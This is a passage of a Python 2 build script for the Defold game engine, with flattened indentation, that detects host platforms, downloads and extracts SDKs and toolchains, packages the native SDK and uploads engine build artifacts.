PACKAGES_MACOS_SDK="MacOSX10.15.sdk"
PACKAGES_XCODE_TOOLCHAIN="XcodeDefault12.0.xctoolchain"
PACKAGES_TAPI_VERSION="tapi1.6"
WINDOWS_SDK_10_VERSION="10.0.18362.0"
WINDOWS_MSVC_2019_VERSION="14.25.28610"
PACKAGES_WIN32_TOOLCHAIN="Microsoft-Visual-Studio-2019-{0}".format(WINDOWS_MSVC_2019_VERSION)
PACKAGES_WIN32_SDK_10="WindowsKits-{0}".format(WINDOWS_SDK_10_VERSION)
PACKAGES_NODE_MODULE_XHR2="xhr2-v0.1.0"
PACKAGES_ANDROID_NDK="android-ndk-r20"
PACKAGES_ANDROID_SDK="android-sdk"
PACKAGES_LINUX_CLANG="clang-9.0.0"
PACKAGES_LINUX_TOOLCHAIN="clang+llvm-9.0.0-x86_64-linux-gnu-ubuntu-16.04"
PACKAGES_CCTOOLS_PORT="cctools-port-darwin19-6c438753d2252274678d3e0839270045698c159b-linux"
NODE_MODULE_LIB_DIR = os.path.join("ext", "lib", "node_modules")
EMSCRIPTEN_VERSION_STR = "1.39.16"
EMSCRIPTEN_SDK = "sdk-{0}-64bit".format(EMSCRIPTEN_VERSION_STR)
PACKAGES_EMSCRIPTEN_SDK="emsdk-{0}".format(EMSCRIPTEN_VERSION_STR)
SHELL = os.environ.get('SHELL', 'bash')
ENGINE_LIBS = "testmain ddf particle glfw graphics lua hid input physics resource extension script render rig gameobject gui sound liveupdate crash gamesys tools record iap push iac webview profiler facebook engine sdk".split()
EXTERNAL_LIBS = "bullet3d".split()
def is_64bit_machine():
return platform.machine().endswith('64')
# Legacy format, should be removed eventually
# Returns: [linux|x86_64-linux|win32|x86_64-win32|darwin]
def get_host_platform():
if sys.platform == 'linux2':
arch = platform.architecture()[0]
if arch == '64bit':
return 'x86_64-linux'
else:
return 'linux'
elif sys.platform == 'win32' and is_64bit_machine():
return 'x86_64-win32'
else:
return sys.platform
# The difference from get_host_platform is that it returns the correct platform
# Returns: [x86|x86_64][win32|linux|darwin]
def get_host_platform2():
if sys.platform == 'linux2':
arch = platform.architecture()[0]
if arch == '64bit':
return 'x86_64-linux'
else:
return 'x86-linux'
elif sys.platform == 'win32':
if is_64bit_machine():
return 'x86_64-win32'
else:
return 'x86-win32'
elif sys.platform == 'darwin':
if is_64bit_machine():
return 'x86_64-darwin'
else:
return 'x86-darwin'
else:
raise Exception("Unknown host platform: %s" % sys.platform)
def format_exes(name, platform):
prefix = ''
suffix = ['']
if 'win32' in platform:
suffix = ['.exe']
elif 'android' in platform:
prefix = 'lib'
suffix = ['.so']
elif 'js-web' in platform:
prefix = ''
suffix = ['.js']
elif 'wasm-web' in platform:
prefix = ''
suffix = ['.js', '.wasm']
elif platform in ['arm64-nx64']:
prefix = ''
suffix = ['.nss', '.nso']
else:
suffix = ['']
exes = []
for suff in suffix:
exes.append('%s%s%s' % (prefix, name, suff))
return exes
# return '%s%s%s' % (prefix, name, suffix)
def format_lib(name, platform):
prefix = 'lib'
suffix = ''
if 'darwin' in platform or 'ios' in platform:
suffix = '.dylib'
elif 'win32' in platform:
prefix = ''
suffix = '.dll'
else:
suffix = '.so'
return '%s%s%s' % (prefix, name, suffix)
class ThreadPool(object):
def __init__(self, worker_count):
self.workers = []
self.work_queue = Queue()
for i in range(worker_count):
w = Thread(target = self.worker)
w.setDaemon(True)
w.start()
self.workers.append(w)
def worker(self):
func, args, future = self.work_queue.get()
while func:
try:
result = func(*args)
future.result = result
except Exception,e:
future.result = e
future.event.set()
func, args, future = self.work_queue.get()
class Future(object):
def __init__(self, pool, f, *args):
self.result = None
self.event = Event()
pool.work_queue.put([f, args, self])
def __call__(self):
try:
# In order to respond to ctrl+c wait with timeout...
while not self.event.is_set():
self.event.wait(0.1)
except KeyboardInterrupt,e:
sys.exit(0)
if isinstance(self.result, Exception):
raise self.result
else:
return self.result
def download_sdk(conf, url, targetfolder, strip_components=1, force_extract=False, format='z'):
if not os.path.exists(targetfolder) or force_extract:
if not os.path.exists(os.path.dirname(targetfolder)):
os.makedirs(os.path.dirname(targetfolder))
path = conf.get_local_or_remote_file(url)
conf._extract_tgz_rename_folder(path, targetfolder, strip_components, format=format)
else:
print "SDK already installed:", targetfolder
class Configuration(object):
def __init__(self, dynamo_home = None,
target_platform = None,
skip_tests = False,
skip_codesign = False,
skip_docs = False,
skip_builtins = False,
skip_bob_light = False,
disable_ccache = False,
no_colors = False,
archive_path = None,
package_path = None,
set_version = None,
channel = None,
engine_artifacts = None,
waf_options = [],
save_env_path = None,
notarization_username = None,
notarization_password = None,
notarization_itc_provider = None,
github_token = None,
github_target_repo = None,
github_sha1 = None,
version = None,
codesigning_identity = None,
windows_cert = None,
windows_cert_pass = None):
if sys.platform == 'win32':
home = os.environ['USERPROFILE']
else:
home = os.environ['HOME']
self.dynamo_home = dynamo_home if dynamo_home else join(os.getcwd(), 'tmp', 'dynamo_home')
self.ext = join(self.dynamo_home, 'ext')
self.dmsdk = join(self.dynamo_home, 'sdk')
self.defold = normpath(join(dirname(abspath(__file__)), '..'))
self.defold_root = os.getcwd()
self.host = get_host_platform()
self.host2 = get_host_platform2()
self.target_platform = target_platform
self.build_utility = BuildUtility.BuildUtility(self.target_platform, self.host, self.dynamo_home)
self.skip_tests = skip_tests
self.skip_codesign = skip_codesign
self.skip_docs = skip_docs
self.skip_builtins = skip_builtins
self.skip_bob_light = skip_bob_light
self.disable_ccache = disable_ccache
self.no_colors = no_colors
self.archive_path = archive_path
self.package_path = package_path
self.set_version = set_version
self.channel = channel
self.engine_artifacts = engine_artifacts
self.waf_options = waf_options
self.save_env_path = save_env_path
self.notarization_username = notarization_username
self.notarization_password = notarization_password
self.notarization_itc_provider = notarization_itc_provider
self.github_token = github_token
self.github_target_repo = github_target_repo
self.github_sha1 = github_sha1
self.version = version
self.codesigning_identity = codesigning_identity
self.windows_cert = windows_cert
self.windows_cert_pass = windows_cert_pass
if self.github_token is None:
self.github_token = os.environ.get("GITHUB_TOKEN")
self.thread_pool = None
self.futures = []
if version is None:
with open('VERSION', 'r') as f:
self.version = f.readlines()[0].strip()
self._create_common_dirs()
def __del__(self):
if len(self.futures) > 0:
print('ERROR: Pending futures (%d)' % len(self.futures))
os._exit(5)
def _create_common_dirs(self):
for p in ['ext/lib/python', 'share', 'lib/js-web/js', 'lib/wasm-web/js']:
self._mkdirs(join(self.dynamo_home, p))
def _mkdirs(self, path):
if not os.path.exists(path):
os.makedirs(path)
def _log(self, msg):
print msg
sys.stdout.flush()
sys.stderr.flush()
def distclean(self):
if os.path.exists(self.dynamo_home):
self._log('Removing %s' % self.dynamo_home)
shutil.rmtree(self.dynamo_home)
for lib in ['dlib','texc']+ENGINE_LIBS:
builddir = join(self.defold_root, 'engine/%s/build' % lib)
if os.path.exists(builddir):
self._log('Removing %s' % builddir)
shutil.rmtree(builddir)
# Recreate dirs
self._create_common_dirs()
self._log('distclean done.')
def _extract_tgz(self, file, path):
self._log('Extracting %s to %s' % (file, path))
version = sys.version_info
suffix = os.path.splitext(file)[1]
# Avoid a bug in python 2.7 (fixed in 2.7.2) related to not being able to remove symlinks: http://bugs.python.org/issue10761
if self.host == 'x86_64-linux' and version[0] == 2 and version[1] == 7 and version[2] < 2:
fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'}
run.env_command(self._form_env(), ['tar', 'xf%s' % fmts.get(suffix, 'z'), file], cwd = path)
else:
fmts = {'.gz': 'gz', '.xz': 'xz', '.bzip2': 'bz2'}
tf = TarFile.open(file, 'r:%s' % fmts.get(suffix, 'gz'))
tf.extractall(path)
tf.close()
def _extract_tgz_rename_folder(self, src, target_folder, strip_components=1, format=None):
src = src.replace('\\', '/')
force_local = ''
if os.environ.get('GITHUB_SHA', None) is not None and os.environ.get('TERM', '') == 'cygwin':
force_local = '--force-local' # to make tar not try to "connect" because it found a colon in the source file
self._log('Extracting %s to %s/' % (src, target_folder))
parentdir, dirname = os.path.split(target_folder)
old_dir = os.getcwd()
os.chdir(parentdir)
if not os.path.exists(dirname):
os.makedirs(dirname)
if format is None:
suffix = os.path.splitext(src)[1]
fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'}
format = fmts.get(suffix, 'z')
cmd = ['tar', 'xf%s' % format, src, '-C', dirname]
if strip_components:
cmd.extend(['--strip-components', '%d' % strip_components])
if force_local:
cmd.append(force_local)
run.env_command(self._form_env(), cmd)
os.chdir(old_dir)
def _extract_zip(self, file, path):
self._log('Extracting %s to %s' % (file, path))
zf = zipfile.ZipFile(file, 'r')
zf.extractall(path)
zf.close()
def _extract(self, file, path):
if os.path.splitext(file)[1] == '.zip':
self._extract_zip(file, path)
else:
self._extract_tgz(file, path)
def _copy(self, src, dst):
self._log('Copying %s -> %s' % (src, dst))
shutil.copy(src, dst)
def _copy_tree(self, src, dst):
self._log('Copying %s -> %s' % (src, dst))
shutil.copytree(src, dst)
def _download(self, url):
self._log('Downloading %s' % (url))
path = http_cache.download(url, lambda count, total: self._log('Downloading %s %.2f%%' % (url, 100 * count / float(total))))
if not path:
self._log('Downloading %s failed' % (url))
return path
def install_go(self):
urls = {
'x86_64-darwin': 'https://storage.googleapis.com/golang/go1.7.1.darwin-amd64.tar.gz',
'x86_64-linux' : 'https://storage.googleapis.com/golang/go1.7.1.linux-amd64.tar.gz',
'win32' : 'https://storage.googleapis.com/golang/go1.7.1.windows-386.zip',
'x86_64-win32' : 'https://storage.googleapis.com/golang/go1.7.1.windows-amd64.zip'
}
url = urls.get(self.target_platform)
if url:
path = self._download(url)
target_path = join(self.ext, 'go', self.target_platform)
self._extract(path, target_path)
else:
print("No go found for %s" % self.target_platform)
def _check_package_path(self):
if self.package_path is None:
print("No package path provided. Use either --package-path option or DM_PACKAGES_URL environment variable")
sys.exit(1)
def install_ext(self):
def make_package_path(root, platform, package):
return join(root, 'packages', package) + '-%s.tar.gz' % platform
def make_package_paths(root, platform, packages):
return [make_package_path(root, platform, package) for package in packages]
self._check_package_path()
print("Installing common packages")
for p in PACKAGES_ALL:
self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.ext)
for p in DMSDK_PACKAGES_ALL:
self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.dmsdk)
# TODO: Make sure the order of install does not affect the outcome!
platform_packages = {
'win32': PACKAGES_WIN32,
'x86_64-win32': PACKAGES_WIN32_64,
'x86_64-linux': PACKAGES_LINUX_64,
'darwin': PACKAGES_DARWIN, # ?? Still used by bob-light?
'x86_64-darwin': PACKAGES_DARWIN_64,
'armv7-darwin': PACKAGES_IOS,
'arm64-darwin': PACKAGES_IOS_64,
'x86_64-ios': PACKAGES_IOS_X86_64,
'armv7-android': PACKAGES_ANDROID,
'arm64-android': PACKAGES_ANDROID_64,
'js-web': PACKAGES_EMSCRIPTEN,
'wasm-web': PACKAGES_EMSCRIPTEN
}
base_platforms = self.get_base_platforms()
target_platform = self.target_platform
other_platforms = set(platform_packages.keys()).difference(set(base_platforms), set([target_platform, self.host]))
if target_platform in ['js-web', 'wasm-web']:
node_modules_dir = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR)
for package in PACKAGES_NODE_MODULES:
path = join(self.defold_root, 'packages', package + '.tar.gz')
name = package.split('-')[0]
self._extract_tgz(path, join(node_modules_dir, name))
installed_packages = set()
for platform in other_platforms:
packages = platform_packages.get(platform, [])
package_paths = make_package_paths(self.defold_root, platform, packages)
print("Installing %s packages " % platform)
for path in package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(package_paths)
for base_platform in self.get_base_platforms():
packages = list(PACKAGES_HOST) + build_private.get_install_host_packages(base_platform)
packages.extend(platform_packages.get(base_platform, []))
package_paths = make_package_paths(self.defold_root, base_platform, packages)
package_paths = [path for path in package_paths if path not in installed_packages]
if len(package_paths) != 0:
print("Installing %s packages" % base_platform)
for path in package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(package_paths)
target_packages = platform_packages.get(self.target_platform, []) + build_private.get_install_target_packages(self.target_platform)
target_package_paths = make_package_paths(self.defold_root, self.target_platform, target_packages)
target_package_paths = [path for path in target_package_paths if path not in installed_packages]
if len(target_package_paths) != 0:
print("Installing %s packages" % self.target_platform)
for path in target_package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(target_package_paths)
print("Installing python eggs")
run.env_command(self._form_env(), ['easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), 'requests'])
run.env_command(self._form_env(), ['easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), 'pyaml'])
for egg in glob(join(self.defold_root, 'packages', '*.egg')):
self._log('Installing %s' % basename(egg))
run.env_command(self._form_env(), ['python', '-m', 'easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), '-N', egg])
print("Installing javascripts")
for n in 'js-web-pre.js'.split():
self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share'))
for n in 'js-web-pre-engine.js'.split():
self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share'))
print("Installing profiles etc")
for n in itertools.chain(*[ glob('share/*%s' % ext) for ext in ['.mobileprovision', '.xcent', '.supp']]):
self._copy(join(self.defold_root, n), join(self.dynamo_home, 'share'))
# Simple way to reduce number of warnings in the build
proto_path = os.path.join(self.dynamo_home, 'share', 'proto')
if not os.path.exists(proto_path):
os.makedirs(proto_path)
# Note: This is a step we want to separate from install_ext
# since it should actually be before install_ext (e.g. to build the extensions)
self.install_sdk()
def get_local_or_remote_file(self, path):
if os.path.isdir(self.package_path): # is is a local path?
if os.path.exists(path):
return os.path.normpath(os.path.abspath(path))
print "Could not find local file:", path
sys.exit(1)
dirname, basename = os.path.split(path)
path = dirname + "/" + urllib.quote(basename)
path = self._download(path) # it should be an url
if path is None:
print("Error. Could not download %s" % path)
sys.exit(1)
return path
def check_sdk(self):
sdkfolder = join(self.ext, 'SDKs')
folders = []
if self.target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
folders.append(join(sdkfolder, PACKAGES_MACOS_SDK))
folders.append(join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN))
if self.target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
folders.append(join(sdkfolder, PACKAGES_IOS_SDK))
folders.append(join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK))
if self.target_platform in ('x86_64-win32', 'win32'):
folders.append(join(sdkfolder, 'Win32','WindowsKits','10'))
folders.append(join(sdkfolder, 'Win32','MicrosoftVisualStudio14.0','VC'))
if self.target_platform in ('armv7-android', 'arm64-android'):
folders.append(join(sdkfolder, PACKAGES_ANDROID_NDK))
folders.append(join(sdkfolder, PACKAGES_ANDROID_SDK))
for f in folders:
if not os.path.exists(f):
print "Missing SDK in", f
print "Run './scripts/build.py install_ext --platform=%s'" % self.target_platform
sys.exit(1)
def install_sdk(self):
sdkfolder = join(self.ext, 'SDKs')
target_platform = self.target_platform
if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
# macOS SDK
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_MACOS_SDK), join(sdkfolder, PACKAGES_MACOS_SDK))
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_XCODE_TOOLCHAIN), join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN))
if target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
# iOS SDK
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SDK), join(sdkfolder, PACKAGES_IOS_SDK))
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_IOS_SIMULATOR_SDK), join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK))
if 'win32' in target_platform or ('win32' in self.host2):
win32_sdk_folder = join(self.ext, 'SDKs', 'Win32')
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_SDK_10), join(win32_sdk_folder, 'WindowsKits', '10') )
download_sdk(self,'%s/%s.tar.gz' % (self.package_path, PACKAGES_WIN32_TOOLCHAIN), join(win32_sdk_folder, 'MicrosoftVisualStudio14.0'), strip_components=0 )
# On OSX, the file system is already case insensitive, so no need to duplicate the files as we do on the extender server
if target_platform in ('armv7-android', 'arm64-android'):
host = self.host
if 'win32' in host:
host = 'windows'
elif 'linux' in host:
host = 'linux'
# Android NDK
download_sdk(self, '%s/%s-%s-x86_64.tar.gz' % (self.package_path, PACKAGES_ANDROID_NDK, host), join(sdkfolder, PACKAGES_ANDROID_NDK))
# Android SDK
download_sdk(self, '%s/%s-%s-android-29-29.0.3.tar.gz' % (self.package_path, PACKAGES_ANDROID_SDK, host), join(sdkfolder, PACKAGES_ANDROID_SDK))
if 'linux' in self.host2:
download_sdk(self, '%s/%s.tar.xz' % (self.package_path, PACKAGES_LINUX_TOOLCHAIN), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), format='J')
if target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios') and 'linux' in self.host2:
if not os.path.exists(join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'cctools')):
download_sdk(self, '%s/%s.tar.gz' % (self.package_path, PACKAGES_CCTOOLS_PORT), join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG), force_extract=True)
build_private.install_sdk(self, target_platform)
def get_ems_dir(self):
return join(self.ext, 'SDKs', 'emsdk-' + EMSCRIPTEN_VERSION_STR)
def _form_ems_path(self):
upstream = join(self.get_ems_dir(), 'upstream', 'emscripten')
if os.path.exists(upstream):
return upstream
return join(self.get_ems_dir(), 'fastcomp', 'emscripten')
def install_ems(self):
# TODO: should eventually be moved to install_sdk
emsDir = self.get_ems_dir()
os.environ['EMSCRIPTEN'] = self._form_ems_path()
os.environ['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten')
os.environ['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache')
if os.path.isdir(emsDir):
print "Emscripten is already installed:", emsDir
else:
self._check_package_path()
platform_map = {'x86_64-linux':'linux','x86_64-darwin':'darwin','x86_64-win32':'win32'}
path = join(self.package_path, '%s-%s.tar.gz' % (PACKAGES_EMSCRIPTEN_SDK, platform_map.get(self.host, self.host)))
path = self.get_local_or_remote_file(path)
self._extract(path, join(self.ext, 'SDKs'))
config = os.environ['EM_CONFIG']
if not os.path.isfile(config):
self.activate_ems()
def activate_ems(self):
version = EMSCRIPTEN_VERSION_STR
if 'fastcomp' in self._form_ems_path():
version += "-fastcomp"
run.env_command(self._form_env(), [join(self.get_ems_dir(), 'emsdk'), 'activate', version, '--embedded'])
# prewarm the cache
# Although this method might be more "correct", it also takes 10 minutes more than we'd like on CI
#run.env_command(self._form_env(), ['%s/embuilder.py' % self._form_ems_path(), 'build', 'SYSTEM', 'MINIMAL'])
# .. so we stick with the old version of prewarming
# Compile a file warm up the emscripten caches (libc etc)
c_file = tempfile.mktemp(suffix='.c')
exe_file = tempfile.mktemp(suffix='.js')
with open(c_file, 'w') as f:
f.write('int main() { return 0; }')
run.env_command(self._form_env(), ['%s/emcc' % self._form_ems_path(), c_file, '-o', '%s' % exe_file])
def check_ems(self):
home = os.path.expanduser('~')
config = join(home, '.emscripten')
err = False
if not os.path.isfile(config):
print 'No .emscripten file.'
err = True
emsDir = self.get_ems_dir()
if not os.path.isdir(emsDir):
print 'Emscripten tools not installed.'
err = True
if err:
print 'Consider running install_ems'
def _git_sha1(self, ref = None):
return self.build_utility.git_sha1(ref)
def _ziptree(self, path, outfile = None, directory = None):
# Directory is similar to -C in tar
if not outfile:
outfile = tempfile.NamedTemporaryFile(delete = False)
zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED)
for root, dirs, files in os.walk(path):
for f in files:
p = os.path.join(root, f)
an = p
if directory:
an = os.path.relpath(p, directory)
zip.write(p, an)
zip.close()
return outfile.name
def _add_files_to_zip(self, zip, paths, directory=None, topfolder=None):
for p in paths:
if not os.path.isfile(p):
continue
an = p
if directory:
an = os.path.relpath(p, directory)
if topfolder:
an = os.path.join(topfolder, an)
zip.write(p, an)
def is_cross_platform(self):
return self.host != self.target_platform
def is_desktop_target(self):
return self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']
# package the native SDK, return the path to the zip file
def _package_platform_sdk(self, platform):
with open(join(self.dynamo_home, 'defoldsdk.zip'), 'wb') as outfile:
zip = zipfile.ZipFile(outfile, 'w', zipfile.ZIP_DEFLATED)
topfolder = 'defoldsdk'
defold_home = os.path.normpath(os.path.join(self.dynamo_home, '..', '..'))
# Includes
includes = []
cwd = os.getcwd()
os.chdir(self.dynamo_home)
for root, dirs, files in os.walk("sdk/include"):
for file in files:
if file.endswith('.h'):
includes.append(os.path.join(root, file))
os.chdir(cwd)
includes = [os.path.join(self.dynamo_home, x) for x in includes]
self._add_files_to_zip(zip, includes, os.path.join(self.dynamo_home, 'sdk'), topfolder)
# Configs
configs = ['extender/build.yml']
configs = [os.path.join(self.dynamo_home, x) for x in configs]
self._add_files_to_zip(zip, configs, self.dynamo_home, topfolder)
# Variants
variants = []
cwd = os.getcwd()
os.chdir(self.dynamo_home)
for root, dirs, files in os.walk("extender/variants"):
for file in files:
if file.endswith('.appmanifest'):
variants.append(os.path.join(root, file))
os.chdir(cwd)
variants = [os.path.join(self.dynamo_home, x) for x in variants]
self._add_files_to_zip(zip, variants, self.dynamo_home, topfolder)
def _findlibs(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.a', '.dylib', '.so', '.lib', '.dll')]
return paths
def _findjars(jardir, ends_with):
paths = os.listdir(jardir)
paths = [os.path.join(jardir, x) for x in paths if x.endswith(ends_with)]
return paths
def _findjslibs(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.js',)]
return paths
# Dynamo libs
libdir = os.path.join(self.dynamo_home, 'lib/%s' % platform)
paths = _findlibs(libdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# External libs
libdir = os.path.join(self.dynamo_home, 'ext/lib/%s' % platform)
paths = _findlibs(libdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Android Jars (Dynamo)
jardir = os.path.join(self.dynamo_home, 'share/java')
paths = _findjars(jardir, ('android.jar', 'dlib.jar', 'r.jar'))
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Android Jars (external)
external_jars = ("android-support-multidex.jar",
"android.jar")
jardir = os.path.join(self.dynamo_home, 'ext/share/java')
paths = _findjars(jardir, external_jars)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# Win32 resource files
engine_rc = os.path.join(self.dynamo_home, 'lib/%s/defold.ico' % platform)
defold_ico = os.path.join(self.dynamo_home, 'lib/%s/engine.rc' % platform)
self._add_files_to_zip(zip, [engine_rc, defold_ico], self.dynamo_home, topfolder)
# JavaScript files
# js-web-pre-x files
jsdir = os.path.join(self.dynamo_home, 'share')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# libraries for js-web
jsdir = os.path.join(self.dynamo_home, 'lib/js-web/js/')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# libraries for wasm-web
jsdir = os.path.join(self.dynamo_home, 'lib/wasm-web/js/')
paths = _findjslibs(jsdir)
self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder)
# For logging, print all paths in zip:
for x in zip.namelist():
print(x)
zip.close()
return outfile.name
return None
def build_platform_sdk(self):
# Helper function to make it easier to build a platform sdk locally
try:
path = self._package_platform_sdk(self.target_platform)
except Exception, e:
print "Failed to package sdk for platform %s: %s" % (self.target_platform, e)
else:
print "Wrote %s" % path
def build_builtins(self):
with open(join(self.dynamo_home, 'share', 'builtins.zip'), 'wb') as f:
self._ziptree(join(self.dynamo_home, 'content', 'builtins'), outfile = f, directory = join(self.dynamo_home, 'content'))
def _strip_engine(self, path):
""" Strips the debug symbols from an executable """
if self.target_platform not in ['x86_64-linux','x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios','armv7-android','arm64-android']:
return False
sdkfolder = join(self.ext, 'SDKs')
strip = "strip"
if 'android' in self.target_platform:
ANDROID_NDK_VERSION = '20'
ANDROID_NDK_ROOT = os.path.join(sdkfolder,'android-ndk-r%s' % ANDROID_NDK_VERSION)
ANDROID_GCC_VERSION = '4.9'
if target_platform == 'armv7-android':
ANDROID_PLATFORM = 'arm-linux-androideabi'
elif target_platform == 'arm64-android':
ANDROID_PLATFORM = 'aarch64-linux-android'
ANDROID_HOST = 'linux' if sys.platform == 'linux2' else 'darwin'
strip = "%s/toolchains/%s-%s/prebuilt/%s-x86_64/bin/%s-strip" % (ANDROID_NDK_ROOT, ANDROID_PLATFORM, ANDROID_GCC_VERSION, ANDROID_HOST, ANDROID_PLATFORM)
if self.target_platform in ('x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios') and 'linux2' == sys.platform:
strip = os.path.join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'bin', 'x86_64-apple-darwin19-strip')
run.shell_command("%s %s" % (strip, path))
return True
def archive_engine(self):
sha1 = self._git_sha1()
full_archive_path = join(sha1, 'engine', self.target_platform).replace('\\', '/')
share_archive_path = join(sha1, 'engine', 'share').replace('\\', '/')
java_archive_path = join(sha1, 'engine', 'share', 'java').replace('\\', '/')
dynamo_home = self.dynamo_home
self.full_archive_path = full_archive_path
bin_dir = self.build_utility.get_binary_path()
lib_dir = self.target_platform
# upload editor 2.0 launcher
if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']:
launcher_name = format_exes("launcher", self.target_platform)[0]
launcherbin = join(bin_dir, launcher_name)
self.upload_to_archive(launcherbin, '%s/%s' % (full_archive_path, launcher_name))
# upload gdc tool on desktop platforms
if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']:
gdc_name = format_exes("gdc", self.target_platform)[0]
gdc_bin = join(bin_dir, gdc_name)
self.upload_to_archive(gdc_bin, '%s/%s' % (full_archive_path, gdc_name))
for n in ['dmengine', 'dmengine_release', 'dmengine_headless']:
for engine_name in format_exes(n, self.target_platform):
engine = join(bin_dir, engine_name)
self.upload_to_archive(engine, '%s/%s' % (full_archive_path, engine_name))
engine_stripped = join(bin_dir, engine_name + "_stripped")
shutil.copy2(engine, engine_stripped)
if self._strip_engine(engine_stripped):
self.upload_to_archive(engine_stripped, '%s/stripped/%s' % (full_archive_path, engine_name))
if 'win32' in self.target_platform:
pdb = join(bin_dir, os.path.splitext(engine_name)[0] + '.pdb')
self.upload_to_archive(pdb, '%s/%s' % (full_archive_path, os.path.basename(pdb)))
if 'web' in self.target_platform:
engine_mem = join(bin_dir, engine_name + '.mem')
if os.path.exists(engine_mem):
self.upload_to_archive(engine_mem, '%s/%s.mem' % (full_archive_path, engine_name))
engine_symbols = join(bin_dir, engine_name + '.symbols')
if os.path.exists(engine_symbols):
self.upload_to_archive(engine_symbols, '%s/%s.symbols' % (full_archive_path, engine_name))
elif 'darwin' in self.target_platform:
engine_symbols = join(bin_dir, engine_name + '.dSYM.zip')
if os.path.exists(engine_symbols):
self.upload_to_archive(engine_symbols, '%s/%s' % (full_archive_path, os.path.basename(engine_symbols)))
zip_archs = []
if not self.skip_docs:
zip_archs.append('ref-doc.zip')
if not self.skip_builtins:
zip_archs.append('builtins.zip')
for zip_arch in zip_archs:
self.upload_to_archive(join(dynamo_home, 'share', zip_arch), '%s/%s' % (share_archive_path, zip_arch))
if self.target_platform == 'x86_64-linux':
# NOTE: It's arbitrary for which platform we archive dlib.jar. Currently set to linux 64-bit
self.upload_to_archive(join(dynamo_home, 'share', 'java', 'dlib.jar'), '%s/dlib.jar' % (java_archive_path))
if 'android' in self.target_platform:
files = [
('share/java', 'classes.dex'),
('bin/%s' % (self.target_platform), 'dmengine.apk'),
('ext/share/java', 'android.jar'),
]
for f in files:
src = join(dynamo_home, f[0], f[1])
self.upload_to_archive(src, '%s/%s' % (full_archive_path, f[1]))
resources = self._ziptree(join(dynamo_home, 'ext', 'share', 'java', 'res'), directory = join(dynamo_home, 'ext', 'share', 'java'))
self.upload_to_archive(resources, '%s/android-resources.zip' % (full_archive_path))
if self.is_desktop_target():
libs = ['texc', 'particle']
for lib in libs:
lib_name = format_lib('%s_shared' % (lib), self.target_platform)
lib_path = join(dynamo_home, 'lib', lib_dir, lib_name)
self.upload_to_archive(lib_path, '%s/%s' % (full_archive_path, lib_name))
sdkpath = self._package_platform_sdk(self.target_platform)
self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % full_archive_path)
def _get_build_flags(self):
supported_tests = {}
supported_tests['darwin'] = ['darwin', 'x86_64-darwin']
supported_tests['x86_64-win32'] = ['win32', 'x86_64-win32', 'arm64-nx64']
supports_tests = self.target_platform in supported_tests.get(self.host, []) or self.host == self.target_platform
skip_tests = '--skip-tests' if self.skip_tests or not supports_tests else ''
skip_codesign = '--skip-codesign' if self.skip_codesign else ''
disable_ccache = '--disable-ccache' if self.disable_ccache else ''
return {'skip_tests':skip_tests, 'skip_codesign':skip_codesign, 'disable_ccache':disable_ccache, 'prefix':None}
def get_base_platforms(self):
# Base platforms is the platforms to build the base libs for.
# The base libs are the libs needed to build bob, i.e. contains compiler code.
platform_dependencies = {'darwin': ['darwin', 'x86_64-darwin'], # x86_64-darwin from IOS fix 3dea8222
'x86_64-linux': [],
'x86_64-win32': ['win32']}
platforms = list(platform_dependencies.get(self.host, [self.host]))
if not self.host in platforms:
platforms.append(self.host)
return platforms
def _build_engine_cmd(self, skip_tests, skip_codesign, disable_ccache, prefix):
